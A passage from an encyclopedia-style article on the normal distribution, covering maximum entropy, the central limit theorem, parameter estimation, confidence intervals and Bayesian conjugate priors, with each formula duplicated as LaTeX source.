mean⁠μ{\displaystyle \mu }⁠and finite variance⁠σ2{\displaystyle \sigma ^{2}}⁠, the normal distributionN(μ,σ2){\textstyle N(\mu ,\sigma ^{2})}is the one withmaximum entropy.[29]To see this, let⁠X{\displaystyle X}⁠be acontinuous random variablewithprobability density⁠f(x){\displaystyle f(x)}⁠. The entropy of⁠X{\displaystyle X}⁠is defined as[30][31][32]H(X)=−∫−∞∞f(x)ln⁡f(x)dx,{\displaystyle H(X)=-\int _{-\infty }^{\infty }f(x)\ln f(x)\,dx\,,} wheref(x)log⁡f(x){\textstyle f(x)\log f(x)}is understood to be zero whenever⁠f(x)=0{\displaystyle f(x)=0}⁠. This functional can be maximized, subject to the constraints that the distribution is properly normalized and has a specified mean and variance, by usingvariational calculus. A function with threeLagrange multipliersis defined: L=−∫−∞∞f(x)ln⁡f(x)dx−λ0(1−∫−∞∞f(x)dx)−λ1(μ−∫−∞∞f(x)xdx)−λ2(σ2−∫−∞∞f(x)(x−μ)2dx).{\displaystyle L=-\int _{-\infty }^{\infty }f(x)\ln f(x)\,dx-\lambda _{0}\left(1-\int _{-\infty }^{\infty }f(x)\,dx\right)-\lambda _{1}\left(\mu -\int _{-\infty }^{\infty }f(x)x\,dx\right)-\lambda _{2}\left(\sigma ^{2}-\int _{-\infty }^{\infty }f(x)(x-\mu )^{2}\,dx\right)\,.} At maximum entropy, a small variationδf(x){\textstyle \delta f(x)}aboutf(x){\textstyle f(x)}will produce a variationδL{\textstyle \delta L}about⁠L{\displaystyle L}⁠which is equal to 0: 0=δL=∫−∞∞δf(x)(−ln⁡f(x)−1+λ0+λ1x+λ2(x−μ)2)dx.{\displaystyle 0=\delta L=\int _{-\infty }^{\infty }\delta f(x)\left(-\ln f(x)-1+\lambda _{0}+\lambda _{1}x+\lambda _{2}(x-\mu )^{2}\right)\,dx\,.} Since this must hold for any small⁠δf(x){\displaystyle \delta f(x)}⁠, the factor multiplying⁠δf(x){\displaystyle \delta f(x)}⁠must be zero, and solving for⁠f(x){\displaystyle f(x)}⁠yields: f(x)=exp⁡(−1+λ0+λ1x+λ2(x−μ)2).{\displaystyle f(x)=\exp \left(-1+\lambda _{0}+\lambda _{1}x+\lambda _{2}(x-\mu )^{2}\right)\,.} The Lagrange constraints that⁠f(x){\displaystyle f(x)}⁠is properly normalized and has the specified mean and variance are satisfied if and only if⁠λ0{\displaystyle \lambda _{0}}⁠,⁠λ1{\displaystyle \lambda _{1}}⁠, and⁠λ2{\displaystyle \lambda _{2}}⁠are chosen so thatf(x)=12πσ2e−(x−μ)22σ2.{\displaystyle f(x)={\frac {1}{\sqrt {2\pi \sigma ^{2}}}}e^{-{\frac {(x-\mu )^{2}}{2\sigma ^{2}}}}\,.}The entropy of a normal distributionX∼N(μ,σ2){\textstyle X\sim N(\mu ,\sigma ^{2})}is equal toH(X)=12(1+ln⁡2σ2π),{\displaystyle H(X)={\tfrac {1}{2}}(1+\ln 2\sigma ^{2}\pi )\,,}which is independent of the mean⁠μ{\displaystyle \mu }⁠. The central limit theorem states that under certain (fairly common) conditions, the sum of many random variables will have an approximately normal distribution. More specifically, whereX1,…,Xn{\textstyle X_{1},\ldots ,X_{n}}areindependent and identically distributedrandom variables with the same arbitrary distribution, zero mean, and varianceσ2{\textstyle \sigma ^{2}}and⁠Z{\displaystyle Z}⁠is their mean scaled byn{\textstyle {\sqrt {n}}}Z=n(1n∑i=1nXi){\displaystyle Z={\sqrt {n}}\left({\frac {1}{n}}\sum _{i=1}^{n}X_{i}\right)}Then, as⁠n{\displaystyle n}⁠increases, the probability distribution of⁠Z{\displaystyle Z}⁠will tend to the normal distribution with zero mean and variance⁠σ2{\displaystyle \sigma ^{2}}⁠. The theorem can be extended to variables(Xi){\textstyle (X_{i})}that are not independent and/or not identically distributed if certain constraints are placed on the degree of dependence and the moments of the distributions. Manytest statistics,scores, andestimatorsencountered in practice contain sums of certain random variables in them, and even more estimators can be represented as sums of random variables through the use ofinfluence functions. The central limit theorem implies that those statistical parameters will have asymptotically normal distributions. The central limit theorem also implies that certain distributions can be approximated by the normal distribution, for example: Whether these approximations are sufficiently accurate depends on the purpose for which they are needed, and the rate of convergence to the normal distribution. It is typically the case that such approximations are less accurate in the tails of the distribution. A general upper bound for the approximation error in the central limit theorem is given by theBerry–Esseen theorem, improvements of the approximation are given by theEdgeworth expansions. This theorem can also be used to justify modeling the sum of many uniform noise sources asGaussian noise. SeeAWGN. Theprobability density,cumulative distribution, andinverse cumulative distributionof any function of one or more independent or correlated normal variables can be computed with the numerical method of ray-tracing[41](Matlab code). In the following sections we look at some special cases. If⁠X{\displaystyle X}⁠is distributed normally with mean⁠μ{\displaystyle \mu }⁠and varianceσ2{\textstyle \sigma ^{2}}, then IfX1{\textstyle X_{1}}andX2{\textstyle X_{2}}are two independent standard normal random variables with mean 0 and variance 1, then Thesplit normal distributionis most directly defined in terms of joining scaled sections of the density functions of different normal distributions and rescaling the density to integrate to one. Thetruncated normal distributionresults from rescaling a section of a single density function. For any positive integern, any normal distribution with mean⁠μ{\displaystyle \mu }⁠and varianceσ2{\textstyle \sigma ^{2}}is the distribution of the sum ofnindependent normal deviates, each with meanμn{\textstyle {\frac {\mu }{n}}}and varianceσ2n{\textstyle {\frac {\sigma ^{2}}{n}}}. This property is calledinfinite divisibility.[47] Conversely, ifX1{\textstyle X_{1}}andX2{\textstyle X_{2}}are independent random variables and their sumX1+X2{\textstyle X_{1}+X_{2}}has a normal distribution, then bothX1{\textstyle X_{1}}andX2{\textstyle X_{2}}must be normal deviates.[48] This result is known asCramér's decomposition theorem, and is equivalent to saying that theconvolutionof two distributions is normal if and only if both are normal. Cramér's theorem implies that a linear combination of independent non-Gaussian variables will never have an exactly normal distribution, although it may approach it arbitrarily closely.[33] TheKac–Bernstein theoremstates that ifX{\textstyle X}and⁠Y{\displaystyle Y}⁠are independent andX+Y{\textstyle X+Y}andX−Y{\textstyle X-Y}are also independent, then bothXandYmust necessarily have normal distributions.[49][50] More generally, ifX1,…,Xn{\textstyle X_{1},\ldots ,X_{n}}are independent random variables, then two distinct linear combinations∑akXk{\textstyle \sum {a_{k}X_{k}}}and∑bkXk{\textstyle \sum {b_{k}X_{k}}}will be independent if and only if allXk{\textstyle X_{k}}are normal and∑akbkσk2=0{\textstyle \sum {a_{k}b_{k}\sigma _{k}^{2}=0}}, whereσk2{\textstyle \sigma _{k}^{2}}denotes the variance ofXk{\textstyle X_{k}}.[49] The notion of normal distribution, being one of the most important distributions in probability theory, has been extended far beyond the standard framework of the univariate (that is one-dimensional) case (Case 1). All these extensions are also callednormalorGaussianlaws, so a certain ambiguity in names exists. A random variableXhas a two-piece normal distribution if it has a distribution fX(x)={N(μ,σ12),ifx≤μN(μ,σ22),ifx≥μ{\displaystyle f_{X}(x)={\begin{cases}N(\mu ,\sigma _{1}^{2}),&{\text{ if }}x\leq \mu \\N(\mu ,\sigma _{2}^{2}),&{\text{ if }}x\geq \mu \end{cases}}} whereμis the mean andσ21andσ22are the variances of the distribution to the left and right of the mean respectively. The meanE(X), varianceV(X), and third central momentT(X)of this distribution have been determined[51] E⁡(X)=μ+2π(σ2−σ1),V⁡(X)=(1−2π)(σ2−σ1)2+σ1σ2,T⁡(X)=2π(σ2−σ1)[(4π−1)(σ2−σ1)2+σ1σ2].{\displaystyle {\begin{aligned}\operatorname {E} (X)&=\mu +{\sqrt {\frac {2}{\pi }}}(\sigma _{2}-\sigma _{1}),\\\operatorname {V} (X)&=\left(1-{\frac {2}{\pi }}\right)(\sigma _{2}-\sigma _{1})^{2}+\sigma _{1}\sigma _{2},\\\operatorname {T} (X)&={\sqrt {\frac {2}{\pi }}}(\sigma _{2}-\sigma _{1})\left[\left({\frac {4}{\pi }}-1\right)(\sigma _{2}-\sigma _{1})^{2}+\sigma _{1}\sigma _{2}\right].\end{aligned}}} One of the main practical uses of the Gaussian law is to model the empirical distributions of many different random variables encountered in practice. In such case a possible extension would be a richer family of distributions, having more than two parameters and therefore being able to fit the empirical distribution more accurately. The examples of such extensions are: It is often the case that we do not know the parameters of the normal distribution, but instead want toestimatethem. That is, having a sample(x1,…,xn){\textstyle (x_{1},\ldots ,x_{n})}from a normalN(μ,σ2){\textstyle {\mathcal {N}}(\mu ,\sigma ^{2})}population we would like to learn the approximate values of parameters⁠μ{\displaystyle \mu }⁠andσ2{\textstyle \sigma ^{2}}. The standard approach to this problem is themaximum likelihoodmethod, which requires maximization of thelog-likelihood function:ln⁡L(μ,σ2)=∑i=1nln⁡f(xi∣μ,σ2)=−n2ln⁡(2π)−n2ln⁡σ2−12σ2∑i=1n(xi−μ)2.{\displaystyle \ln {\mathcal {L}}(\mu ,\sigma ^{2})=\sum _{i=1}^{n}\ln f(x_{i}\mid \mu ,\sigma ^{2})=-{\frac {n}{2}}\ln(2\pi )-{\frac {n}{2}}\ln \sigma ^{2}-{\frac {1}{2\sigma ^{2}}}\sum _{i=1}^{n}(x_{i}-\mu )^{2}.}Taking derivatives with respect to⁠μ{\displaystyle \mu }⁠andσ2{\textstyle \sigma ^{2}}and solving the resulting system of first order conditions yields themaximum likelihood estimates:μ^=x¯≡1n∑i=1nxi,σ^2=1n∑i=1n(xi−x¯)2.{\displaystyle {\hat {\mu }}={\overline {x}}\equiv {\frac {1}{n}}\sum _{i=1}^{n}x_{i},\qquad {\hat {\sigma }}^{2}={\frac {1}{n}}\sum _{i=1}^{n}(x_{i}-{\overline {x}})^{2}.} Thenln⁡L(μ^,σ^2){\textstyle \ln {\mathcal {L}}({\hat {\mu }},{\hat {\sigma }}^{2})}is as follows: ln⁡L(μ^,σ^2)=(−n/2)[ln⁡(2πσ^2)+1]{\displaystyle \ln {\mathcal {L}}({\hat {\mu }},{\hat {\sigma }}^{2})=(-n/2)[\ln(2\pi {\hat {\sigma }}^{2})+1]} Estimatorμ^{\displaystyle \textstyle {\hat {\mu }}}is called thesample mean, since it is the arithmetic mean of all observations. The statisticx¯{\displaystyle \textstyle {\overline {x}}}iscompleteandsufficientfor⁠μ{\displaystyle \mu }⁠, and therefore by theLehmann–Scheffé theorem,μ^{\displaystyle \textstyle {\hat {\mu }}}is theuniformly minimum variance unbiased(UMVU) estimator.[52]In finite samples it is distributed normally:μ^∼N(μ,σ2/n).{\displaystyle {\hat {\mu }}\sim {\mathcal {N}}(\mu ,\sigma ^{2}/n).}The variance of this estimator is equal to theμμ-element of the inverseFisher information matrixI−1{\displaystyle \textstyle {\mathcal {I}}^{-1}}. This implies that the estimator isfinite-sample efficient. Of practical importance is the fact that thestandard errorofμ^{\displaystyle \textstyle {\hat {\mu }}}is proportional to1/n{\displaystyle \textstyle 1/{\sqrt {n}}}, that is, if one wishes to decrease the standard error by a factor of 10, one must increase the number of points in the sample by a factor of 100. This fact is widely used in determining sample sizes for opinion polls and the number of trials inMonte Carlo simulations. From the standpoint of theasymptotic theory,μ^{\displaystyle \textstyle {\hat {\mu }}}isconsistent, that is, itconverges in probabilityto⁠μ{\displaystyle \mu }⁠asn→∞{\textstyle n\rightarrow \infty }. The estimator is alsoasymptotically normal, which is a simple corollary of the fact that it is normal in finite samples:n(μ^−μ)→dN(0,σ2).{\displaystyle {\sqrt {n}}({\hat {\mu }}-\mu )\,\xrightarrow {d} \,{\mathcal {N}}(0,\sigma ^{2}).} The estimatorσ^2{\displaystyle \textstyle {\hat {\sigma }}^{2}}is called thesample variance, since it is the variance of the sample ((x1,…,xn){\textstyle (x_{1},\ldots ,x_{n})}). In practice, another estimator is often used instead of theσ^2{\displaystyle \textstyle {\hat {\sigma }}^{2}}. This other estimator is denoteds2{\textstyle s^{2}}, and is also called thesample variance, which represents a certain ambiguity in terminology; its square root⁠s{\displaystyle s}⁠is called thesample standard deviation. The estimators2{\textstyle s^{2}}differs fromσ^2{\displaystyle \textstyle {\hat {\sigma }}^{2}}by having(n− 1)instead ofnin the denominator (the so-calledBessel's correction):s2=nn−1σ^2=1n−1∑i=1n(xi−x¯)2.{\displaystyle s^{2}={\frac {n}{n-1}}{\hat {\sigma }}^{2}={\frac {1}{n-1}}\sum _{i=1}^{n}(x_{i}-{\overline {x}})^{2}.}The difference betweens2{\textstyle s^{2}}andσ^2{\displaystyle \textstyle {\hat {\sigma }}^{2}}becomes negligibly small for largen's. In finite samples however, the motivation behind the use ofs2{\textstyle s^{2}}is that it is anunbiased estimatorof the underlying parameterσ2{\textstyle \sigma ^{2}}, whereasσ^2{\displaystyle \textstyle {\hat {\sigma }}^{2}}is biased. Also, by the Lehmann–Scheffé theorem the estimators2{\textstyle s^{2}}is uniformly minimum variance unbiased (UMVU),[52]which makes it the "best" estimator among all unbiased ones. However it can be shown that the biased estimatorσ^2{\displaystyle \textstyle {\hat {\sigma }}^{2}}is better than thes2{\textstyle s^{2}}in terms of themean squared error(MSE) criterion. In finite samples boths2{\textstyle s^{2}}andσ^2{\displaystyle \textstyle {\hat {\sigma }}^{2}}have scaledchi-squared distributionwith(n− 1)degrees of freedom:s2∼σ2n−1⋅χn−12,σ^2∼σ2n⋅χn−12.{\displaystyle s^{2}\sim {\frac {\sigma ^{2}}{n-1}}\cdot \chi _{n-1}^{2},\qquad {\hat {\sigma }}^{2}\sim {\frac {\sigma ^{2}}{n}}\cdot \chi _{n-1}^{2}.}The first of these expressions shows that the variance ofs2{\textstyle s^{2}}is equal to2σ4/(n−1){\textstyle 2\sigma ^{4}/(n-1)}, which is slightly greater than theσσ-element of the inverse Fisher information matrixI−1{\displaystyle \textstyle {\mathcal {I}}^{-1}}, which is2σ4/n{\textstyle 2\sigma ^{4}/n}. Thus,s2{\textstyle s^{2}}is not an efficient estimator forσ2{\textstyle \sigma ^{2}}, and moreover, sinces2{\textstyle s^{2}}is UMVU, we can conclude that the finite-sample efficient estimator forσ2{\textstyle \sigma ^{2}}does not exist. Applying the asymptotic theory, both estimatorss2{\textstyle s^{2}}andσ^2{\displaystyle \textstyle {\hat {\sigma }}^{2}}are consistent, that is they converge in probability toσ2{\textstyle \sigma ^{2}}as the sample sizen→∞{\textstyle n\rightarrow \infty }. The two estimators are also both asymptotically normal:n(σ^2−σ2)≃n(s2−σ2)→dN(0,2σ4).{\displaystyle {\sqrt {n}}({\hat {\sigma }}^{2}-\sigma ^{2})\simeq {\sqrt {n}}(s^{2}-\sigma ^{2})\,\xrightarrow {d} \,{\mathcal {N}}(0,2\sigma ^{4}).}In particular, both estimators are asymptotically efficient forσ2{\textstyle \sigma ^{2}}. ByCochran's theorem, for normal distributions the sample meanμ^{\displaystyle \textstyle {\hat {\mu }}}and the sample variances2areindependent, which means there can be no gain in considering theirjoint distribution. There is also a converse theorem: if in a sample the sample mean and sample variance are independent, then the sample must have come from the normal distribution. The independence betweenμ^{\displaystyle \textstyle {\hat {\mu }}}andscan be employed to construct the so-calledt-statistic:t=μ^−μs/n=x¯−μ1n(n−1)∑(xi−x¯)2∼tn−1{\displaystyle t={\frac {{\hat {\mu }}-\mu }{s/{\sqrt {n}}}}={\frac {{\overline {x}}-\mu }{\sqrt {{\frac {1}{n(n-1)}}\sum (x_{i}-{\overline {x}})^{2}}}}\sim t_{n-1}}This quantitythas theStudent's t-distributionwith(n− 1)degrees of freedom, and it is anancillary statistic(independent of the value of the parameters). Inverting the distribution of thist-statistics will allow us to construct theconfidence intervalforμ;[53]similarly, inverting theχ2distribution of the statistics2will give us the confidence interval forσ2:[54]μ∈[μ^−tn−1,1−α/2sn,μ^+tn−1,1−α/2sn]{\displaystyle \mu \in \left[{\hat {\mu }}-t_{n-1,1-\alpha /2}{\frac {s}{\sqrt {n}}},\,{\hat {\mu }}+t_{n-1,1-\alpha /2}{\frac {s}{\sqrt {n}}}\right]}σ2∈[n−1χn−1,1−α/22s2,n−1χn−1,α/22s2]{\displaystyle \sigma ^{2}\in \left[{\frac {n-1}{\chi _{n-1,1-\alpha /2}^{2}}}s^{2},\,{\frac {n-1}{\chi _{n-1,\alpha /2}^{2}}}s^{2}\right]}wheretk,pandχ2k,pare thepthquantilesof thet- andχ2-distributions respectively. These confidence intervals are of theconfidence level1 −α, meaning that the true valuesμandσ2fall outside of these intervals with probability (orsignificance level)α. In practice people usually takeα= 5%, resulting in the 95% confidence intervals. The confidence interval forσcan be found by taking the square root of the interval bounds forσ2. Approximate formulas can be derived from the asymptotic distributions ofμ^{\displaystyle \textstyle {\hat {\mu }}}ands2:μ∈[μ^−|zα/2|ns,μ^+|zα/2|ns]{\displaystyle \mu \in \left[{\hat {\mu }}-{\frac {|z_{\alpha /2}|}{\sqrt {n}}}s,\,{\hat {\mu }}+{\frac {|z_{\alpha /2}|}{\sqrt {n}}}s\right]}σ2∈[s2−2|zα/2|ns2,s2+2|zα/2|ns2]{\displaystyle \sigma ^{2}\in \left[s^{2}-{\sqrt {2}}{\frac {|z_{\alpha /2}|}{\sqrt {n}}}s^{2},\,s^{2}+{\sqrt {2}}{\frac {|z_{\alpha /2}|}{\sqrt {n}}}s^{2}\right]}The approximate formulas become valid for large values ofn, and are more convenient for the manual calculation since the standard normal quantileszα/2do not depend onn. In particular, the most popular value ofα= 5%, results in|z0.025| =1.96. Normality tests assess the likelihood that the given data set {x1, ...,xn} comes from a normal distribution. Typically thenull hypothesisH0is that the observations are distributed normally with unspecified meanμand varianceσ2, versus the alternativeHathat the distribution is arbitrary. Many tests (over 40) have been devised for this problem. The more prominent of them are outlined below: Diagnostic plotsare more intuitively appealing but subjective at the same time, as they rely on informal human judgement to accept or reject the null hypothesis. Goodness-of-fit tests: Moment-based tests: Tests based on the empirical distribution function: Bayesian analysis of normally distributed data is complicated by the many different possibilities that may be considered: The formulas for the non-linear-regression cases are summarized in theconjugate priorarticle. The following auxiliary formula is useful for simplifying theposteriorupdate equations, which otherwise become fairly tedious. a(x−y)2+b(x−z)2=(a+b)(x−ay+bza+b)2+aba+b(y−z)2{\displaystyle a(x-y)^{2}+b(x-z)^{2}=(a+b)\left(x-{\frac {ay+bz}{a+b}}\right)^{2}+{\frac {ab}{a+b}}(y-z)^{2}} This equation rewrites the sum of two quadratics inxby expanding the squares, grouping the terms inx, andcompleting the square. Note the following about the complex constant factors attached to some of the terms: A similar formula can be written for the sum of two vector quadratics: Ifx,y,zare vectors of lengthk, andAandBaresymmetric,invertible matricesof sizek×k{\textstyle k\times k}, then (y−x)′A(y−x)+(x−z)′B(x−z)=(x−c)′(A+B)(x−c)+(y−z)′(A−1+B−1)−1(y−z){\displaystyle {\begin{aligned}&(\mathbf {y} -\mathbf {x} )'\mathbf {A} (\mathbf {y} -\mathbf {x} )+(\mathbf {x} -\mathbf {z} )'\mathbf {B} (\mathbf {x} -\mathbf {z} )\\={}&(\mathbf {x} -\mathbf {c} )'(\mathbf {A} +\mathbf {B} )(\mathbf {x} -\mathbf {c} )+(\mathbf {y} -\mathbf {z} )'(\mathbf {A} ^{-1}+\mathbf {B} ^{-1})^{-1}(\mathbf {y} -\mathbf {z} )\end{aligned}}} where c=(A+B)−1(Ay+Bz){\displaystyle \mathbf {c} =(\mathbf {A} +\mathbf {B} )^{-1}(\mathbf {A} \mathbf {y} +\mathbf {B} \mathbf {z} )} The formx′Axis called aquadratic formand is ascalar:x′Ax=∑i,jaijxixj{\displaystyle \mathbf {x} '\mathbf {A} \mathbf {x} =\sum _{i,j}a_{ij}x_{i}x_{j}}In other words, it sums up all possible combinations of products of pairs of elements fromx, with a separate coefficient for each. In addition, sincexixj=xjxi{\textstyle x_{i}x_{j}=x_{j}x_{i}}, only the sumaij+aji{\textstyle a_{ij}+a_{ji}}matters for any off-diagonal elements ofA, and there is no loss of generality in assuming thatAissymmetric. Furthermore, ifAis symmetric, then the formx′Ay=y′Ax.{\textstyle \mathbf {x} '\mathbf {A} \mathbf {y} =\mathbf {y} '\mathbf {A} \mathbf {x} .} Another useful formula is as follows:∑i=1n(xi−μ)2=∑i=1n(xi−x¯)2+n(x¯−μ)2{\displaystyle \sum _{i=1}^{n}(x_{i}-\mu )^{2}=\sum _{i=1}^{n}(x_{i}-{\bar {x}})^{2}+n({\bar {x}}-\mu )^{2}}wherex¯=1n∑i=1nxi.{\textstyle {\bar {x}}={\frac {1}{n}}\sum _{i=1}^{n}x_{i}.} For a set ofi.i.d.normally distributed data pointsXof sizenwhere each individual pointxfollowsx∼N(μ,σ2){\textstyle x\sim {\mathcal {N}}(\mu ,\sigma ^{2})}with knownvarianceσ2, theconjugate priordistribution is also normally distributed. This can be shown more easily by rewriting the variance as theprecision, i.e. using τ = 1/σ2. Then ifx∼N(μ,1/τ){\textstyle x\sim {\mathcal {N}}(\mu ,1/\tau )}andμ∼N(μ0,1/τ0),{\textstyle \mu \sim {\mathcal {N}}(\mu _{0},1/\tau _{0}),}we proceed as follows. First, thelikelihood functionis (using the formula above for the sum of differences from the mean): p(X∣μ,τ)=∏i=1nτ2πexp⁡(−12τ(xi−μ)2)=(τ2π)n/2exp⁡(−12τ∑i=1n(xi−μ)2)=(τ2π)n/2exp⁡[−12τ(∑i=1n(xi−x¯)2+n(x¯−μ)2)].{\displaystyle {\begin{aligned}p(\mathbf {X} \mid \mu ,\tau )&=\prod _{i=1}^{n}{\sqrt {\frac {\tau }{2\pi }}}\exp \left(-{\frac {1}{2}}\tau (x_{i}-\mu )^{2}\right)\\&=\left({\frac {\tau }{2\pi }}\right)^{n/2}\exp \left(-{\frac {1}{2}}\tau \sum _{i=1}^{n}(x_{i}-\mu )^{2}\right)\\&=\left({\frac {\tau }{2\pi }}\right)^{n/2}\exp \left[-{\frac {1}{2}}\tau \left(\sum _{i=1}^{n}(x_{i}-{\bar {x}})^{2}+n({\bar {x}}-\mu )^{2}\right)\right].\end{aligned}}} Then, we proceed as follows: p(μ∣X)∝p(X∣μ)p(μ)=(τ2π)n/2exp⁡[−12τ(∑i=1n(xi−x¯)2+n(x¯−μ)2)]τ02πexp⁡(−12τ0(μ−μ0)2)∝exp⁡(−12(τ(∑i=1n(xi−x¯)2+n(x¯−μ)2)+τ0(μ−μ0)2))∝exp⁡(−12(nτ(x¯−μ)2+τ0(μ−μ0)2))=exp⁡(−12(nτ+τ0)(μ−nτx¯+τ0μ0nτ+τ0)2+nττ0nτ+τ0(x¯−μ0)2)∝exp⁡(−12(nτ+τ0)(μ−nτx¯+τ0μ0nτ+τ0)2){\displaystyle {\begin{aligned}p(\mu \mid \mathbf {X} )&\propto p(\mathbf {X} \mid \mu )p(\mu )\\&=\left({\frac {\tau }{2\pi }}\right)^{n/2}\exp \left[-{\frac {1}{2}}\tau \left(\sum _{i=1}^{n}(x_{i}-{\bar {x}})^{2}+n({\bar {x}}-\mu )^{2}\right)\right]{\sqrt {\frac {\tau _{0}}{2\pi }}}\exp \left(-{\frac {1}{2}}\tau _{0}(\mu -\mu _{0})^{2}\right)\\&\propto \exp \left(-{\frac {1}{2}}\left(\tau \left(\sum _{i=1}^{n}(x_{i}-{\bar {x}})^{2}+n({\bar {x}}-\mu )^{2}\right)+\tau _{0}(\mu -\mu _{0})^{2}\right)\right)\\&\propto \exp \left(-{\frac {1}{2}}\left(n\tau ({\bar {x}}-\mu )^{2}+\tau _{0}(\mu -\mu _{0})^{2}\right)\right)\\&=\exp \left(-{\frac {1}{2}}(n\tau +\tau _{0})\left(\mu -{\dfrac {n\tau {\bar {x}}+\tau _{0}\mu _{0}}{n\tau +\tau _{0}}}\right)^{2}+{\frac {n\tau \tau _{0}}{n\tau +\tau _{0}}}({\bar {x}}-\mu _{0})^{2}\right)\\&\propto \exp \left(-{\frac {1}{2}}(n\tau +\tau _{0})\left(\mu -{\dfrac {n\tau {\bar {x}}+\tau _{0}\mu _{0}}{n\tau +\tau _{0}}}\right)^{2}\right)\end{aligned}}} In the above derivation, we used the formula above for the sum of two quadratics and eliminated all constant factors not involvingμ. The result is thekernelof a normal distribution, with meannτx¯+τ0μ0nτ+τ0{\textstyle {\frac {n\tau {\bar {x}}+\tau _{0}\mu _{0}}{n\tau +\tau _{0}}}}and precisionnτ+τ0{\textstyle n\tau +\tau _{0}}, i.e. p(μ∣X)∼N(nτx¯+τ0μ0nτ+τ0,1nτ+τ0){\displaystyle p(\mu \mid \mathbf {X} )\sim {\mathcal {N}}\left({\frac {n\tau {\bar {x}}+\tau _{0}\mu _{0}}{n\tau +\tau _{0}}},{\frac {1}{n\tau +\tau _{0}}}\right)} This can be written as a set of Bayesian update equations for the posterior parameters in terms of the prior parameters: τ0′=τ0+nτμ0′=nτx¯+τ0μ0nτ+τ0x¯=1n∑i=1nxi{\displaystyle {\begin{aligned}\tau _{0}'&=\tau _{0}+n\tau \\[5pt]\mu _{0}'&={\frac {n\tau {\bar {x}}+\tau _{0}\mu _{0}}{n\tau +\tau _{0}}}\\[5pt]{\bar {x}}&={\frac {1}{n}}\sum _{i=1}^{n}x_{i}\end{aligned}}} That is, to combinendata points with total precision ofnτ(or equivalently, total variance ofn/σ2) and mean of valuesx¯{\textstyle {\bar {x}}}, derive a new total precision simply by adding the total precision of the data to the prior total precision, and form a new mean through aprecision-weighted average, i.e. aweighted averageof the data mean and the prior mean, each weighted by the associated total precision. This makes logical sense if the precision is thought of as indicating the certainty of the observations: In the distribution of the posterior mean, each of the input components is weighted by its certainty, and the certainty of this distribution is the sum of the individual certainties. (For the intuition of this, compare the expression "the whole is (or is not) greater than the sum of its parts". In addition, consider that the knowledge of the posterior comes from a combination of the knowledge of the prior and likelihood, so it makes sense that we are more certain of it than of either of its components.) The above formula reveals why it is more convenient to doBayesian analysisofconjugate priorsfor the normal distribution in terms of the precision. The posterior precision is simply the sum of the prior and likelihood precisions, and the posterior mean is computed through a precision-weighted average, as described above. The same formulas can be written in terms of variance by reciprocating all the precisions, yielding the more ugly formulas σ02′=1nσ2+1σ02μ0′=nx¯σ2+μ0σ02nσ2+1σ02x¯=1n∑i=1nxi{\displaystyle {\begin{aligned}{\sigma _{0}^{2}}'&={\frac {1}{{\frac {n}{\sigma ^{2}}}+{\frac {1}{\sigma _{0}^{2}}}}}\\[5pt]\mu _{0}'&={\frac {{\frac {n{\bar {x}}}{\sigma ^{2}}}+{\frac {\mu _{0}}{\sigma _{0}^{2}}}}{{\frac {n}{\sigma ^{2}}}+{\frac {1}{\sigma _{0}^{2}}}}}\\[5pt]{\bar {x}}&={\frac {1}{n}}\sum _{i=1}^{n}x_{i}\end{aligned}}} For a set ofi.i.d.normally distributed data pointsXof sizenwhere each individual pointxfollowsx∼N(μ,σ2){\textstyle x\sim {\mathcal {N}}(\mu ,\sigma ^{2})}with known mean μ, theconjugate priorof thevariancehas aninverse gamma distributionor ascaled inverse chi-squared distribution. The two are equivalent except for having differentparameterizations. Although the inverse gamma is more commonly used, we use the scaled inverse chi-squared for the sake of convenience. The prior for σ2is as follows: p(σ2∣ν0,σ02)=(σ02ν02)ν0/2Γ(ν02)exp⁡[−ν0σ022σ2](σ2)1+ν02∝exp⁡[−ν0σ022σ2](σ2)1+ν02{\displaystyle p(\sigma ^{2}\mid \nu _{0},\sigma _{0}^{2})={\frac {(\sigma _{0}^{2}{\frac {\nu _{0}}{2}})^{\nu _{0}/2}}{\Gamma \left({\frac {\nu _{0}}{2}}\right)}}~{\frac {\exp \left[{\frac {-\nu _{0}\sigma _{0}^{2}}{2\sigma ^{2}}}\right]}{(\sigma ^{2})^{1+{\frac {\nu _{0}}{2}}}}}\propto {\frac {\exp \left[{\frac {-\nu _{0}\sigma _{0}^{2}}{2\sigma ^{2}}}\right]}{(\sigma ^{2})^{1+{\frac {\nu _{0}}{2}}}}}} Thelikelihood functionfrom above, written in terms of the variance, is: p(X∣μ,σ2)=(12πσ2)n/2exp⁡[−12σ2∑i=1n(xi−μ)2]=(12πσ2)n/2exp⁡[−S2σ2]{\displaystyle {\begin{aligned}p(\mathbf {X} \mid \mu ,\sigma ^{2})&=\left({\frac {1}{2\pi \sigma ^{2}}}\right)^{n/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\sum _{i=1}^{n}(x_{i}-\mu )^{2}\right]\\&=\left({\frac {1}{2\pi \sigma ^{2}}}\right)^{n/2}\exp \left[-{\frac {S}{2\sigma ^{2}}}\right]\end{aligned}}} where S=∑i=1n(xi−μ)2.{\displaystyle S=\sum _{i=1}^{n}(x_{i}-\mu )^{2}.} Then: p(σ2∣X)∝p(X∣σ2)p(σ2)=(12πσ2)n/2exp⁡[−S2σ2](σ02ν02)ν02Γ(ν02)exp⁡[−ν0σ022σ2](σ2)1+ν02∝(1σ2)n/21(σ2)1+ν02exp⁡[−S2σ2+−ν0σ022σ2]=1(σ2)1+ν0+n2exp⁡[−ν0σ02+S2σ2]{\displaystyle {\begin{aligned}p(\sigma ^{2}\mid \mathbf {X} )&\propto p(\mathbf {X} \mid \sigma ^{2})p(\sigma ^{2})\\&=\left({\frac {1}{2\pi \sigma ^{2}}}\right)^{n/2}\exp \left[-{\frac {S}{2\sigma ^{2}}}\right]{\frac {(\sigma _{0}^{2}{\frac {\nu _{0}}{2}})^{\frac {\nu _{0}}{2}}}{\Gamma \left({\frac {\nu _{0}}{2}}\right)}}~{\frac {\exp \left[{\frac {-\nu _{0}\sigma _{0}^{2}}{2\sigma ^{2}}}\right]}{(\sigma ^{2})^{1+{\frac {\nu _{0}}{2}}}}}\\&\propto \left({\frac {1}{\sigma ^{2}}}\right)^{n/2}{\frac {1}{(\sigma ^{2})^{1+{\frac {\nu _{0}}{2}}}}}\exp \left[-{\frac {S}{2\sigma ^{2}}}+{\frac {-\nu _{0}\sigma _{0}^{2}}{2\sigma ^{2}}}\right]\\&={\frac {1}{(\sigma ^{2})^{1+{\frac {\nu _{0}+n}{2}}}}}\exp \left[-{\frac {\nu _{0}\sigma _{0}^{2}+S}{2\sigma ^{2}}}\right]\end{aligned}}} The above is also a scaled inverse chi-squared distribution where 